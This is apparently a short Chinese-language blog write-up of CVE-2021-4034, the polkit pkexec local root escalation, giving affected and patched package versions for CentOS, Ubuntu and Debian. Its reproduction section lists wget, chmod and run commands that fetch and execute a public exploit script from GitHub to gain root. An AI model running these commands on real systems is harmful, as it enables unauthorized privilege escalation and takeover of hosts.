CVE-2021-4034 Linux内核提权
漏洞描述
Qualys 研究团队在 polkit 的 pkexec 中发现了一个内存损坏漏洞,该 SUID 根程序默认安装在每个主要的 Linux 发行版上。这个易于利用的漏洞允许任何非特权用户通过在其默认配置中利用此漏洞来获得易受攻击主机上的完全 root 权限。
漏洞影响范围
2009年5月至今发布的所有 Polkit 版本
注:Polkit预装在CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia等多个Linux发行版上,所有存在Polkit的Linux系统均受影响。
不受影响范围
CentOS:
- CentOS 6:polkit-0.96-11.el6_10.2
- CentOS 7:polkit-0.112-26.el7_9.1
- CentOS 8.0:polkit-0.115-13.el8_5.1
- CentOS 8.2:polkit-0.115-11.el8_2.2
- CentOS 8.4:polkit-0.115-11.el8_4.2
Ubuntu:
- Ubuntu 14.04 ESM:policykit-1-0.105-4ubuntu3.14.04.6+esm1
- Ubuntu 16.04 ESM:policykit-1-0.105-14.1ubuntu0.5+esm1
- Ubuntu 18.04 LTS:policykit-1-0.105-20ubuntu0.18.04.6
- Ubuntu 20.04 LTS:policykit-1-0.105-26ubuntu1.2
- Ubuntu 21.10:policykit-1-0.105-31ubuntu0.1
Debain:
- Debain stretch:policykit-1 0.105-18+deb9u2
- Debain buster:policykit-1 0.105-25+deb10u1
- Debain bullseye:policykit-1 0.105-31+deb11u1
- Debain bookworm,bullseye:policykit-1 0.105-31.1
漏洞复现
执行
wget https://raw.githubusercontent.com/Y3A/CVE-2021-4034/main/cve-2021-4034.sh
chmod +x cve-2021-4034.sh
./cve-2021-4034.sh
提权成功
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Caps!
评论